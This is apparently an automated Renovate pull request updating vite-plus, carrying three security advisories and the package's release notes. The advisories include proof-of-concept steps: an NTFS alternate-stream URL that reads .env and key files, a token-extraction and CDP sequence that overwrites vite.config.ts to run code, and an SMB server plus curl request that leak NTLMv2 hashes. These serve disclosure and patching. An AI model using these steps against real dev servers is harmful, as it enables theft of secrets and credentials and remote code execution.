chore(deps): update dependency vite-plus to v0.1.24 [security]

[renovate]

This PR contains the following updates:

Package	Change	Age	Confidence
vite-plus (source)	0.1.22 → 0.1.24

---

vite: server.fs.deny bypass on Windows alternate paths

CVE-2026-53571 / GHSA-fx2h-pf6j-xcff

More information

Details

Summary

The contents of files that are specified by server.fs.deny can be returned to the browser on Windows.

Impact

Only apps that match the following conditions are affected:

• explicitly exposes the Vite dev server to the network (using --host or server.host config option)
• the sensitive file exists in the allowed directories specified by server.fs.allow
• either of:
  • the sensitive file exists in an NTFS volume
  • the dev server is running on Windows and the sensitive file exists in a volume that 8.3 short name generation is enabled (it is enabled by default on system volumes)

Details

Vite’s dev server denies direct access to sensitive files through server.fs.deny, including entries such as .env, .env.*, and *.{crt,pem}. However, on Windows, the deny logic does not correctly normalize NTFS ADS path forms before access checks are applied.
Because of this, requests such as /.env::$DATA?raw are treated as allowed paths, while Windows resolves them to the original file's default data stream.

Similar to that, Windows allows accessing a file using a different name with the 8.3 short name compatibility feature. Vite did not reject accessing files via them.

PoC

$ npm create vite@latest
$ cd vite-project/
$ npm install
$ npm run dev

Access via browser at http://localhost:5173/.env::$DATA?raw

Example expected result:

• /.env::$DATA?raw returns the contents of .env
• /tls.pem::$DATA?raw returns the contents of tls.pem

Severity

• CVSS Score: 8.2 / 10 (High)
• Vector String: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N

References

• https://github.com/vitejs/vite/security/advisories/GHSA-fx2h-pf6j-xcff
• https://github.com/vitejs/vite

This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).

---

Vitest Browser: Exposed Browser Mode API Can Proxy CDP and Overwrite Config Files, Leading to RCE

CVE-2026-53633 / GHSA-g8mr-85jm-7xhm

More information

Details

Summary

Vitest Browser Mode exposes a cdp() API that forwards raw Chrome DevTools Protocol (CDP) methods over the Vitest browser WebSocket RPC. CDP is not gated by browser.api.allowWrite, browser.api.allowExec, api.allowWrite, or api.allowExec.

As a result, disabling Browser Mode write and exec operations does not prevent a browser API client from using CDP to perform equivalent actions. In a verified reproduction with allowWrite: false and allowExec: false, CDP Page.setDownloadBehavior set the browser download directory to the project root, and CDP Runtime.evaluate downloaded a controlled vite.config.ts. Vitest reloaded the changed config and executed attacker-controlled Node.js code.

When the Browser Mode API is also exposed to the network, this becomes remotely exploitable because the generated browser runner page exposes the API token, active session id, project name, and project root path needed to connect to the browser WebSocket API and select the target download directory.

Impact

This affects Browser Mode projects using a CDP-capable provider, such as Playwright Chromium, when the browser API server is exposed to the network, for example with --browser.api.host=0.0.0.0.

In this mode Vitest warns that write and exec operations are disabled by default, but the generated browser runner page exposes enough metadata for a remote client to authenticate to the browser WebSocket API while an active session exists. This includes the browser API token, active session id, project name, and serialized test config including the project root path. The attacker can then call Vitest's CDP RPC and use Chrome's download controls to overwrite vite.config.ts in the project root. When Vitest reloads the changed config, attacker-controlled Node.js code executes on the host running Vitest.

The same exposed CDP bridge also allows direct browser-session JavaScript execution through Runtime.evaluate. A separate local probe showed that CDP can navigate the browser to a file:// URL and read rendered file contents, but the primary verified impact is config-file overwrite leading to RCE.

Reproduction

For a concrete reproduction, start Browser Mode in watch mode using the official Lit example:

pnpm dlx tiged vitest-dev/vitest/examples/lit vitest-poc
cd vitest-poc
pnpm install

Configure the Browser Mode API to listen on all interfaces while explicitly disabling write and exec operations:

import { playwright } from '@​vitest/browser-playwright'
import { defineConfig } from 'vite'

export default defineConfig({
  test: {
    browser: {
      enabled: true,
      provider: playwright(),
      instances: [
        { browser: 'chromium' },
      ],
      api: {
        host: '0.0.0.0',
        allowWrite: false,
        allowExec: false,
      },
    },
  },
})

Then start the test server:

pnpm test

Vitest serves the browser runner HTML and WebSocket API at http://localhost:63315.

While the browser session is active:

1. Fetch the generated browser runner page:

   http://localhost:63315/__vitest_test__/
   

2. Extract the embedded browser API token, active session id, project name, and project root:

   • window.VITEST_API_TOKEN
   • __vitest_browser_runner__.sessionId
   • __vitest_browser_runner__.config.name
   • __vitest_browser_runner__.config.root

3. Connect to the browser API WebSocket as a tester client:

   /__vitest_browser_api__?type=tester&rpcId=<fresh-id>&sessionId=<session-id>&projectName=<project-name>&method=none&token=<token>
   

4. Call the sendCdpEvent RPC method with:

   Page.setDownloadBehavior({
     behavior: "allow",
     downloadPath: __vitest_browser_runner__.config.root
   })
   

5. Call sendCdpEvent again with Runtime.evaluate. The evaluated JavaScript creates a Blob containing a malicious Vite config and clicks an anchor element <a download="vite.config.ts">.

6. Observed result:

   • vite.config.ts is overwritten with attacker-controlled content.
   • Vitest reloads the changed config.
   • The injected Node.js payload runs on the host.

Severity

• CVSS Score: 9.8 / 10 (Critical)
• Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

References

• https://github.com/vitest-dev/vitest/security/advisories/GHSA-g8mr-85jm-7xhm
• https://github.com/vitest-dev/vitest

This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).

---

launch-editor: NTLMv2 hash disclosure via UNC path handling on Windows

CVE-2026-53632 / GHSA-v6wh-96g9-6wx3

More information

Details

Summary

The launch-editor NPM package accesses arbitrary paths including Windows UNC paths. When a UNC path is opened, Windows automatically attempts NTLM authentication to the remote host, causing the user’s NTLMv2 password hash to be leaked to an attacker-controlled SMB server. This can result in credential compromise through offline hash cracking.

Impact

If the following conditions are met, an attacker can get the NTLMv2 password hash on the computer that is using the launch-editor:

• using Windows
• NTLM is not disabled (it is recommended to disable, while it's still enabled by default)
• the user accesses the attackers website that sends request to a middleware using launch-editor
• the server that has the middleware using launch-editor is running
• the attacker knows the URL for that server and the middleware

This would be a problem if the user password is too simple that it can be identified through offline hash cracking, potentially leading to further compromise of developer accounts or internal systems.

Details

launch-editor accepts file paths without validating or restricting Windows UNC paths such as:

\\attacker-host\share

On Windows systems, accessing a UNC path triggers an automatic NTLM authentication attempt to the remote SMB server. No user interaction or warning is required for this authentication attempt to occur.

If an attacker controls the SMB server referenced by the UNC path the victim’s NTLMv2 hash is transmitted to the attacker. The attacker can then capture the hash and perform offline password cracking. Successful cracking reveals the victim’s cleartext password.

The attacker could target a developer that uses a development server using launch-editor to develop code locally, send them a link and grab their NTLMv2 hash.

PoC

From the attacker side, we will setup an SMB server. I personally used Impacket's smbserver.py, but you could use something like Responder for this as well. For keeping it simple, we will use smbserver.py here.

First, let's create a directory to serve as an SMB share.

mkdir /tmp/data
echo "Hello world" > /tmp/data/test.txt

Then, start the SMB server.

$ sudo smbserver.py -smb2support -debug share /tmp/data

Now, run any project that uses the launch-editor package. I have setup a simple "Hello world" project that uses Vite to do this. Then run the project locally (vite).

Now last, we will open a browser window and navigate to the URL used by the launch-editor package to trigger the NTLM authentication. Or we can use curl to achieve the same.

curl 'http://localhost:5173/__open-in-editor?file=%5c%5c127.0.0.1%5cshare%5ctest.txt'

Note the IP address in the HTTP request, and make sure it connects to the IP address of the SMB server. Now we can look at the logs of smbserver.py and see the NTLMv2 hash coming in.

Severity

• CVSS Score: 5.5 / 10 (Medium)
• Vector String: CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H

References

• https://github.com/vitejs/launch-editor/security/advisories/GHSA-v6wh-96g9-6wx3
• https://github.com/vitejs/launch-editor

This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).

---

Release Notes

voidzero-dev/vite-plus (vite-plus)

v0.1.24: vite-plus v0.1.24

Compare Source

A new vp pm stage publishing workflow, hardened installs and upgrades, a Node-version mismatch reinstall prompt, and the bundled vite/vitest/tsdown stack moves forward.

Features

• vp pm stage: a new vp pm subcommand exposing npm's staged-publishing workflow (upload a build to a staging area without 2FA, then approve or reject it from a trusted device); it maps to pnpm stage / npm stage / yarn npm ... --staged per package manager, with an npm fallback for yarn Classic and bun (#​1715), by @​fengmk2
• vp: prompt to reinstall when up-to-date global packages were built against a different Node.js than the active one (defaults to no); adds --reinstall-node-mismatch and --ignore-node-mismatch, and skips the prompt in CI (#​1666), by @​liangmiQwQ
• vp format: add format as a visible alias of vp fmt, so the common slip vp format resolves correctly and vp format --init / --migrate apply the same vite.config.ts wiring as vp fmt (#​1727), by @​semimikoh

Fixes & Enhancements

• vp install / Node runtime download: HTTP retries now wrap the whole body stream, hash verification, and archive extraction (not just the request headers), so truncated or corrupt downloads of package managers and Node are re-fetched instead of failing on the first attempt (#​1719), by @​fengmk2
• vp upgrade --force on Windows: install into a fresh directory before repointing current, so the forced reinstall no longer fails trying to overwrite the running vp.exe (#​1714), by @​fengmk2
• vp install -g: install global packages directly into their final prefix instead of a temp dir that gets moved, so packages whose postinstall scripts bake in absolute or relative temp paths still resolve their bins; a failed package in a multi-package install no longer removes the shims of the ones that already succeeded (#​1698), by @​liangmiQwQ
• vp why: remove the -g / --global flag, which delegated to the package manager's global mode and ignored Vite+-managed global packages; vp why stays project-scoped while vp outdated -g keeps using the managed global flow (#​1720), by @​liangmiQwQ
• Windows installer: remove the existing current link via PowerShell (detecting junctions, symlinks, and stale directories) instead of cmd /c rmdir, which could fail with "The directory is not empty" (#​1726), by @​TheAlexLichter
• vp create: skip editor-config detection and package-local editor settings by default when creating a project inside an existing monorepo; --editor <name> stays an explicit opt-in and --no-editor an opt-out (#​1729), by @​jong-kyung
• vp create vite:monorepo (pnpm): keep the aliased vite/vitest in the website app's package.json so the workspace overrides.vite: catalog: has a direct consumer and vp why vite resolves to @voidzero-dev/vite-plus-core; npm/yarn/bun still drop the dead-weight keys (#​1728), by @​fengmk2
• vp pack: rewrite direct createRequire(...)("picomatch") calls in bundled tsdown output to the local bundled CJS entry, so packing no longer depends on an undeclared runtime picomatch under pnpm hoist: false (#​1732), by @​fengmk2
• vp migrate: resolve a catalog: husky pin from the workspace catalog (pnpm-workspace.yaml, .yarnrc.yml, or package.json catalogs) during the git-hooks preflight, so a compatible catalog-pinned husky no longer triggers a false "could not determine husky version" warning and skips hook setup (#​1710), by @​fengmk2

Docs

• Add a Copy Prompt button to the docs site that copies an AI-friendly getting-started prompt (intro, llms-full.txt pointer, install commands, and core vp commands) for handing straight to a coding agent (#​1706), by @​fengmk2
• Update troubleshooting.md: vite.config.ts related issues are resolved by updating oxlint and oxfmt (#​1708), by @​leaysgur
• Clarify the product and repository documentation locations and the new Run guide/config paths in AGENTS.md (#​1707), by @​leaysgur

Chore

• vp install: reduce retained vp versions from 5 to 3 across the installer, vp upgrade, and the shell/PowerShell bootstrap scripts (active and previous versions stay protected for rollback); document the 3-version retention and vp upgrade --rollback (#​1716), by @​fengmk2
• Exclude the snap-tests directory from Vitest config discovery so the VS Code Vitest extension stops generating a stray .vitest-plugin-loaded file (#​1723), by @​liangmiQwQ
• Refresh trusted stack stats on the docs homepage (#​1734), by @​voidzero-guard[bot]
• Update @​wan9chi's GitHub handle (formerly branchseer) (#​1705), by @​wan9chi
• Update GitHub Actions (#​1724, #​1730), by @​renovate[bot]
• Upgrade upstream dependencies: vite 8.0.14 → 8.0.16, vitest 4.1.7 → 4.1.8, tsdown 0.22.0 → 0.22.1, @vitejs/devtools 0.2.0 → 0.3.1 (#​1713, #​1735, #​1737), by @​voidzero-guard[bot]

Bundled Versions

Tool	Version	Source
vite	8.0.16	f94df87
rolldown	1.0.3	a287faa
tsdown	0.22.1	npm
vitest	4.1.8	npm
oxlint	1.67.0	npm
oxlint-tsgolint	0.23.0	npm
oxfmt	0.52.0	npm

New Contributors

Welcome to our new contributor @​semimikoh! 🎉

Full Changelog: voidzero-dev/vite-plus@v0.1.23...v0.1.24

Published Packages

• @voidzero-dev/vite-plus-core@0.1.24
• @voidzero-dev/vite-plus-test@0.1.24
• vite-plus@0.1.24

Installation

macOS/Linux:

curl -fsSL https://vite.plus | bash

Windows:

irm https://vite.plus/ps1 | iex

Or download and run vp-setup.exe from the assets below.

Upgrade:

vp upgrade

v0.1.23: vite-plus v0.1.23

Compare Source

Enterprise-ready HTTP (proxy + custom CA), task command shorthands in vite.config.ts, a smoother vp create/vp migrate, and the oxc/vite/rolldown bundled stack moves forward.

Highlights

• Proxy and custom-CA aware HTTP: a new process-wide vite_shared::shared_http_client() honors HTTPS_PROXY / HTTP_PROXY / NO_PROXY, picks up macOS System Settings / Windows registry proxies, loads custom CAs from SSL_CERT_FILE and NODE_EXTRA_CA_CERTS, and exposes a VP_INSECURE_TLS diagnostic switch; makes vp work through Socket Firewall Free and other TLS-intercepting proxies (#​1686), by @​fengmk2
• Task command shorthands: run.tasks entries in vite.config.ts now accept a bare string ("build": "cmd") or array ("build": ["cmd1", "cmd2"]) instead of always requiring { command: ... }; arrays reuse the existing && planning path so cache, dependsOn, and task options stay consistent (vite-task#391), by @​jong-kyung
• Managed vp outdated -g: routes through Vite+'s managed global package metadata instead of delegating to the underlying npm outdated -g store, so all installed global packages are reported consistently (#​1659), by @​liangmiQwQ

Features

• vp pm approve-builds: new unified subcommand that mirrors pnpm approve-builds one-to-one, adapts to bun pm trust, and warns-and-noops on npm/yarn (#​1662), by @​fengmk2
• vp create: opt-in GitHub Copilot setup; selecting --agent copilot now generates a .github/workflows/copilot-setup-steps.yml so the Copilot Coding Agent can set up Vite+ and run vp in the new project out of the box (#​1683), by @​jong-kyung
• vp migrate: prompt to remove baseUrl from tsconfig.json before applying type-aware lint defaults (runs @andrewbranch/ts5to6 --fixBaseUrl . under the hood; auto-applied in non-interactive mode) (#​1692), by @​TheAlexLichter
• Respect packageManager in package-manager shims (npm/npx, pnpm/pnpx, yarn/yarnpkg, bun/bunx); add non-mutating packageManager resolution metadata for vp env current and vp env which (#​1654), by @​fengmk2
• vite-task: --filter no-match now exits 0 by default; add --fail-if-no-match to opt back in (vite-task#393), by @​kazupon

Fixes & Enhancements

• vp create: keep generated .vscode/settings.json trackable when the VS Code editor option is selected (avoid templates' .vscode/* .gitignore masking it) (#​1700), by @​jong-kyung
• vp create vite:monorepo: normalize sub-package vite-plus to catalog: even when only vite-plus (not vite/vitest/...) is present, and drop the vite/vitest aliases generated by the upstream library template (#​1697), by @​fengmk2
• vp add/install -g <path>: resolve the real package name from package.json instead of using the path string, so local-path installs don't create broken directories (#​1685), by @​liangmiQwQ
• vp test --coverage and other direct built-in commands now expose the workspace's package.json#packageManager to child processes so tools like Vitest coverage can spawn the configured PM (#​1696), by @​jong-kyung
• vp migrate: clean up the whole ESLint ecosystem (plugins, configs, parser/resolver, type-utils) rather than just eslint; skip the migration entirely when @nuxt/eslint is detected (#​1682), by @​fengmk2
• vp create: write fmt.configPath (not configPath) for Zed oxfmt settings to match the official Zed OXC extension layout (#​1687), by @​chungweileong94
• vp migrate: parse tsconfig.json as JSONC so files with comments don't break baseUrl detection/removal (#​1688), by @​TheAlexLichter
• vp env setup: Unix env shims now point at the active vp executable instead of always assuming VP_HOME/current/bin/vp, so Homebrew-style installs work (#​1631), by @​leohara
• vp outdated -g / vp why -g: don't require a local package.json; global commands run regardless of cwd (#​1622), by @​liangmiQwQ
• vp create: default the "Initialize a git repository?" prompt to yes (#​1650), by @​fengmk2
• vp hooks: include the managed Node bin in PATH so ./node_modules/.bin/vp can find node from a VS Code commit on macOS (#​1647), by @​TheAlexLichter
• vpx on Windows now invokes the package's .cmd shim instead of the Unix binary (#​1652), by @​tobynguyen27
• vite-task: bump cache database schema to version 13 (forces a one-time rebuild of the local task cache) (vite-task#402), by @​branchseer
• Bump vite-task to d02b257 and 5833b374; also bumps the repo's Rust nightly toolchain to nightly-2026-05-24 and ships the regenerated run config types and docs for the new task command shorthand (#​1689, #​1695), by @​branchseer

Refactor

• Replace VP_SHELL_NU/VP_SHELL_PWSH with a single VP_SHELL override; add explicit shell parsing for bash, zsh, fish, nu, pwsh, and cmd, and harden auto-detection against nested shells (#​1658), by @​nekomoyi
• vite-task: replace allocator-api2 with bumpalo collections (vite-task#400), by @​branchseer
• vite-task: drop the unused and_item_index field from ExecutionItemDisplay (vite-task#394), by @​branchseer

Docs

• Add the root AGENTS.md as the primary AI-agent guide for the vite-plus repository; convert CLAUDE.md into a compatibility pointer (#​1670), by @​jong-kyung
• Align the agent validation table to match AGENTS.md (#​1673), by @​jong-kyung
• Update the task output caching guide so the documented behavior matches what vite-task actually does (#​1639), by @​ericclemmons
• Correct the bundled-source location in packages/core/BUNDLING.md (#​1660), by @​shulaoda

Chore

• Clarify --help text for vp env default/pin/use/exec with Examples: blocks (#​1664), by @​Boshen
• Refresh trusted stack stats on the docs homepage (#​1680), by @​voidzero-guard[bot]
• Drop the standalone pnpm --filter @​rolldown/pluginutils build step now that @rolldown/pluginutils is published from its own package (#​1655), by @​shulaoda
• Preserve single-quote style when sync-remote rewrites pnpm-workspace.yaml (#​1672), by @​lyzno1
• Enable vite_pm_cli lib tests by removing a stale test = false flag (#​1661), by @​shulaoda
• CI: switch macOS runners back to namespace-profile-mac-default (#​1701), by @​fengmk2
• CI: fix release-day flakes in the upgrade test and snap test when the dev package.json version equals npm latest (#​1645), by @​fengmk2
• CI: replace zizmor and cargo-deny workflows with oxc-project/security-action (#​1635), by @​Boshen
• CI: warm-up monorepo cache test under npm (#​1649), by @​fengmk2
• CI: attach per-target vp binary archives (.tar.gz/.zip) to GitHub Releases alongside the existing vp-setup-*.exe installers (#​1665), by @​Boshen
• CI: declare Playwright via repo.json in ecosystem tests and bump consumers to >=1.60 to dodge the Node 24.16.0 hang (#​1668), by @​fengmk2
• Update GitHub Actions (#​1640, #​1675, #​1678, #​1679, #​1691), by @​renovate[bot]
• Upgrade upstream dependencies: vite 8.0.11 → 8.0.14, rolldown 1.0.0 → 1.0.3, vitest 4.1.6 → 4.1.7, oxlint 1.63.0 → 1.67.0, oxfmt 0.48.0 → 0.52.0, oxlint-tsgolint 0.22.1 → 0.23.0, @oxc-project/* and oxc Rust crates 0.129.0 → 0.133.0 (#​1646, #​1653, #​1693, #​1699), by @​voidzero-guard[bot]

Bundled Versions

Tool	Version	Source
vite	8.0.14	c917f1e
rolldown	1.0.3	a287faa
tsdown	0.22.0	npm
vitest	4.1.7	npm
oxlint	1.67.0	npm
oxlint-tsgolint	0.23.0	npm
oxfmt	0.52.0	npm

New Contributors

Welcome to all new contributors! 🎉

@​ericclemmons, @​tobynguyen27, @​shulaoda, @​leohara, @​chungweileong94

Full Changelog: voidzero-dev/vite-plus@v0.1.22...v0.1.23

Published Packages

• @voidzero-dev/vite-plus-core@0.1.23
• @voidzero-dev/vite-plus-test@0.1.23
• vite-plus@0.1.23

Installation

macOS/Linux:

curl -fsSL https://vite.plus | bash

Windows:

irm https://vite.plus/ps1 | iex

Or download and run vp-setup.exe from the assets below.

Upgrade:

vp upgrade

---

Configuration

📅 Schedule: (in timezone Asia/Tokyo)

• Branch creation
  • At any time (no schedule defined)
• Automerge
  • At any time (no schedule defined)

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

---

• If you want to rebase/retry this PR, check this box

---

This PR was generated by Mend Renovate. View the repository job log.

[github-actions]

🔍 Preset previews

各 lint プリセットの effective ルールをブラウザで確認できます → 一覧を開く

preset	preview
backend	backend.html
base	base.html
nextjs	nextjs.html
react	react.html
tailwind	tailwind.html
test	test.html
typescript	typescript.html

_{このPRのブランチに対応する最新のプレビューです。push のたびに更新されます。}